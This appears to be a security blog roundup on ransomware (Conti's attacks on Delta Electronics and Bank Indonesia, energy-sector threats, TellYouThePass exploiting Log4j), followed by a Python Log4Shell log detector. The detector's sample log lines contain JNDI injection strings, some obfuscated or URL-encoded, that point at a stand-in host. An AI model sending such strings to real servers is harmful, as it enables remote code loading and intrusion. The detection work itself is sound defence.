Ransomware is a type of malicious software that locks users out of a computer and demands payment in exchange for restored access. The data on the computer may be stolen, destroyed, or hidden, or the computer itself may be locked; some ransomware also tries to infect other computers on the network.

BEC (business email compromise) efforts accounted for 50% of cases, with SaaS apps being the most common target. More than 90% of the attacks targeted Microsoft Office 365, with attacks against Google Workspace accounting for less than 1% of all events. Okta was the objective of the remaining 9%. 

Ransomware was responsible for 13% of all opportunistic attacks. Legal services, communications, financial services, real estate, and entertainment were the top five industries attacked. Furthermore, Expel discovered that 35 percent of web app hacks resulted in the deployment of a crypto miner.

Is the user at risk of being a victim of a ransomware assault due to security flaws?

  • The device in use is no longer current. 
  • The device's software is out of date. 
  • Browsers and/or operating systems are no longer patched. 
  • There is no suitable backup plan in place. 
  • Cybersecurity has received insufficient attention, and no solid plan has been put in place. 

How to Protect Oneself against Ransomware: 

  • Set up a firewall.
  • Keep immutable backups. 
  • Raise staff awareness. 
  • Segment the network. 
  • Strengthen passwords.
  • Enhance endpoint security. 
  • Increase the security of your email.
  • Apply the principle of least privilege. 
  • Install ad blockers.

When it comes to combating ransomware, caution and the deployment of effective protection software, like with other forms of malware, are a good start. The development of backups is especially important when dealing with this form of malware, as it allows users to be well prepared even in the worst-case scenario.

Conti Ransomware Targets Taiwanese Apple and Tesla Supplier Delta Electronics

Taiwanese electronics manufacturing firm Delta Electronics was targeted by the Conti ransomware this week. The company operates as a supplier for major tech giants such as Apple, Tesla, HP, and Dell. 

According to a statement circulated on January 22, 2022, the company said the incident only affected non-critical systems, which had no significant impact on its operations. Delta is now working on restoring systems taken down during the attack and says it has hired the services of third-party security experts to help with the investigation and recovery process.

The company added that it had notified law enforcement agencies and hired information systems advisers to investigate the attack and to improve network security. While Delta's statement did not disclose who was behind the attack, an undisclosed information security company discovered a Conti ransomware sample deployed on the company's network. 

The Conti operators claim to have encrypted 1,500 servers and 12,000 computers out of about 65,000 devices on the company’s network. The Conti ransomware gang is said to have demanded a $15 million ransom payment from Delta and stopped leaking files stolen from its network. 

While Delta is still reportedly working with Trend and Microsoft's security teams to investigate the incident and claims that its production has not been affected, its website is still down one week after the attack. 

"The Conti ransomware group revealed a specific pattern part of the Delta attack leveraging Cobalt Strike with Atera for persistence as revealed by our platform adversarial visibility. Certainly, this attack is reminiscent of the REvil Quanta one affecting one of the Apple suppliers," Vitali Kremez, CEO of AdvIntel, stated. 

The Conti ransomware gang first emerged in 2020 and has been linked to the Russian-speaking Wizard Spider cybercrime group. The ransomware gang has targeted multiple high-profile organizations including Ireland's Department of Health (DoH) and Health Service Executive (HSE), and the RR Donnelley (RRD) marketing giant.

Conti has also been the subject of two government warnings. The first was by the U.S. Federal Bureau of Investigation in May, followed by a warning from the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency in September. 

“Cybercriminals continue to target organizations that provide a service or product to larger organizations with the expectation that they cannot suffer downtime due to a ransomware attack and will be inclined to pay up faster,” James McQuiggan, a security expert at security awareness training company KnowBe4 Inc., said. “While the attack was substantial, it appears the organization took the necessary actions to protect the critical equipment and systems within their organizations, as it seems that the cybercriminal group targeted corporate systems like their webpage.”

Conti Cyberattack Reported via Bank Indonesia

Bank Indonesia (BI), the country's central bank, was hit by ransomware, but according to the bank the incident was contained before it had any impact on BI's essential services, as Reuters first reported.

"Last month, BI was informed of a ransomware attack. The bank was targeted by a cyber-attack. This is a true crime, the bank had witnessed," said Erwin Haryono, spokesman for Bank Indonesia. 

According to CNN Indonesia, the criminals allegedly took "non-critical" staff data and planted ransomware payloads on multiple computers on the bank's network during the attack on a central bank branch on the island of Sumatra. While Bank Indonesia didn't disclose who was behind the ransomware assault, security experts believe it was perpetrated by the Conti ransomware gang. 

Conti is a Russian-speaking ransomware cell that has infected over 400 companies globally, including 290 in the United States alone. Conti attackers gain access to victim networks primarily through phishing emails (malicious URLs or attachments) or stolen or cracked Windows Remote Desktop Protocol (RDP) credentials. 

The group appears to target high-profile company networks, which it infiltrates using BazarLoader or TrickBot malware to gain unauthorised remote access to key devices. After compromising the network, the threat actors work to spread the infection to additional connected devices. They then steal records, encrypt servers and desktops, and demand a ransom payment. 

The Conti ransomware group claimed responsibility for the attack and listed Bank Indonesia among its victims on a Tor leaks site, claiming to have stolen about 14 GB (13.88 GB) of data.

Cybercriminals use ransomware to infiltrate a target's network, compromise critical data, and encrypt systems, rendering them unavailable to their owners. To decrypt the affected systems, the threat actors demand a ransom. If the victim resists, the attackers may threaten to expose confidential information to put more pressure on the individual or organization.

Bank Indonesia should analyze the severity of the attack, according to Miftah Fadhli, a cybersecurity specialist at the NGO Institute of Policy Research and Advocacy (ELSAM), because it might "carry a major danger" and affect its transactions.

Cyber Attacks Are A Threat To The Energy Sector

According to a senior industry source, concern over cyber-attacks on power plants and electricity grids is "off the scale" in the UK energy sector. It just takes one component to fail for the entire chain to be disrupted, resulting in a cascade effect that affects our daily life. 

As winter approaches, the supply chain that serves the UK's crucial demand for gas and power is experiencing a broad energy crisis. The global gas crisis has put pressure on the UK's electricity system, which has already seen numerous ageing nuclear power facilities take unplanned maintenance outages, while persistent energy shortages are expected to force further industry shutdowns. 

"The United Kingdom stands out in terms of cyber threats. Our energy system's cyber threats are over the charts," Steve Holliday stated. The UK parliament is reeling from a "sustained and aggressive" cyber-attack that has rendered MPs' email inaccessible.

So, why is the energy sector a target for cyber-attacks and why is it vulnerable? 

Any effect on the energy sector can have far-reaching consequences for entire towns and even countries. An attack on a power plant or a pipeline can result in widespread blackouts, disrupting transportation, heating, and other important economic functions. According to Mohammed AlMohtadi, the chief information security officer at Abu Dhabi's Injazat, the risk in the energy business derives from the usage of old industrial control systems that haven't been modernized in years and aren't properly linked across systems. 

So, how can big energy and utility businesses fall victim to cyber-attacks? 

Typically, ransomware attacks are used to steal commercial secrets, confidential data, and intellectual property. "The energy sector is classified as vital infrastructure. The nation's financial and physical infrastructure might be crippled if it is infiltrated," warned Avinash Advani, founder and CEO of CyberKnight, a Dubai-based cybersecurity firm. Potential targets include oil and gas infrastructure, nuclear power plants, electricity grids, water corporations, and utility companies that provide power, water, and sewage treatment to the population. 

The Covid-19 epidemic has revealed the dark side of the energy sector. As more people work from home to stop the spread of the coronavirus, they unknowingly expose their company to cyber-attacks. Given the devastating consequences of cyber attacks, the energy business should not underestimate the groups that target its facilities; it should focus on reinforcing its cybersecurity technology to ensure that its firewalls are secure and that any outdated, archaic computer systems and software still in use are adequately protected.

TellYouThePass Resurges and is Now Abusing Log4j to Install Ransomware

TellYouThePass, a ransomware family that had gone inactive, has resurfaced. Researchers from the KnownSec 404 Team and the Sangfor Threat Intelligence Team report that it is exploiting the Apache Log4j vulnerability CVE-2021-44228 to target both Linux and Windows-based computers.

A researcher from the KnownSec 404 Team first reported the attacks on Twitter after noticing that the ransomware's activity surged just after Log4Shell PoC exploits were published online; the Sangfor security team later confirmed the attacks after intercepting the logs. 

“On December 13, Sangfor’s terminal security team and Anfu’s emergency response center jointly monitored ransomware called Tellyouthepass, which has attacked both platforms. Sangfor has captured a large number of Tellyouthepass ransomware interception logs” reads the analysis published by Sangfor. 

It's worth noting that this is not the first time Tellyouthepass ransomware has used severe flaws to launch attacks: as early as last year, it used the EternalBlue exploit to target multiple organizational units. 

Cybersecurity researchers received 30 samples of TellYouThePass ransomware on December 13, a relatively high number given that the ransomware had remained inactive since the summer of 2020. According to Curated Intelligence, an ID-Ransomware (IDR) metric confirmed a surge in submissions for this ransomware. 

“Curated Intel member @PolarToffee responded with an ID-Ransomware (IDR) metric, proving that on December 13th, more than 30 samples of ‘TellYouThePass’ ransomware were submitted to IDR, indicating that ‘a very sudden spike in submissions for what is a very old ransomware [that day],’” reported Curated Intelligence. 

In recent months, there have been multiple incidents where attackers have exploited the Log4Shell vulnerability. Initially, the flaw was exploited by multiple state-sponsored attackers from China, Iran, North Korea, and Turkey. The financially driven attackers started injecting Monero miners on compromised devices and state-backed hackers began leveraging it to establish footholds for further operations. 

Khonsari ransomware payloads were also identified on self-hosted Minecraft servers by the BitDefender Threat Intelligence Team. The ransomware skips files with the extensions .ini and .lnk and encrypts the rest using AES-128 in CBC mode with PaddingMode.Zeros. 

Finally, the Conti ransomware gang has added a Log4Shell attack to its arsenal, allowing its operators to move laterally through victims’ networks, gain access to VMware vCenter Server instances, and encrypt virtual machines.
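Defenders who want to find the Log4Shell probing described in this post in their own web server logs have to cope with the fact that the ${jndi:...} lookup can arrive URL-encoded or wrapped in nested Log4j lookups, so a plain substring match misses much of it. The script below is an added example, not code from the researchers or the page: it normalises each log line (URL-decoding it, then collapsing lower/upper and default-value lookups from the inside out) before matching, and runs over a constructed set of Apache-style access log lines. The log lines, hostnames and the list of JNDI schemes are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# JNDI URL schemes worth flagging (assumption: the common ones seen in scanning).
JNDI_SCHEMES = ("ldap", "ldaps", "rmi", "dns", "iiop", "corba", "nds", "http")

# Innermost ${...} lookup, i.e. one that contains no further "${".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A fully normalised JNDI lookup: ${jndi:<scheme>://<target>}
_JNDI = re.compile(r"\$\{jndi:(" + "|".join(JNDI_SCHEMES) + r")://([^}]*)\}",
                   re.IGNORECASE)

# Constructed sample access log lines (not real traffic). Lines 2 to 5 carry a
# lookup in the user agent, path, referer and URL-encoded query respectively.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Dec/2021:10:02:03 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://scanner.example/a}"',
    '198.51.100.8 - - [13/Dec/2021:10:02:09 +0000] "GET /?x=${${lower:j}ndi:${lower:rmi}://scanner.example/b} '
    'HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.9 - - [13/Dec/2021:10:02:15 +0000] "GET /api HTTP/1.1" 200 10 '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://scanner.example/c}" "-"',
    '203.0.113.4 - - [13/Dec/2021:10:03:00 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fscanner.example%2Fd%7D '
    'HTTP/1.1" 200 5 "-" "x"',
    '10.0.0.6 - - [13/Dec/2021:10:04:00 +0000] "GET /docs/${user} HTTP/1.1" 200 5 "-" "-"',
]


def _resolve(match):
    """Collapse one innermost lookup the way Log4j's string substitution would."""
    body = match.group(1)
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                  # ${lookup:-default} evaluates to the default
        return body.rsplit(":-", 1)[1]
    return match.group(0)             # e.g. ${jndi:...}: keep it for matching


def normalize(line, max_rounds=10):
    """URL-decode, then resolve nested lookups inside-out until nothing changes."""
    text = unquote(line)
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi(line):
    """(scheme, target) pairs for every JNDI lookup in one log line."""
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalize(line))]


def scan(lines):
    """Scan a list of log lines; each hit records the 1-based line number."""
    hits = []
    for number, line in enumerate(lines, 1):
        for scheme, target in find_jndi(line):
            hits.append({"line": number, "scheme": scheme, "target": target})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi {hit['scheme']} lookup to {hit['target']}")
```

The normalisation step is what makes the detector useful: lines 3 and 4 contain no literal "jndi" at all until the nested lower: and default-value lookups are collapsed, and line 5 only reveals its lookup after URL decoding. The last line, which carries a harmless ${user} placeholder, is left alone, since the detector only reports lookups that resolve to a jndi: reference with one of the listed schemes.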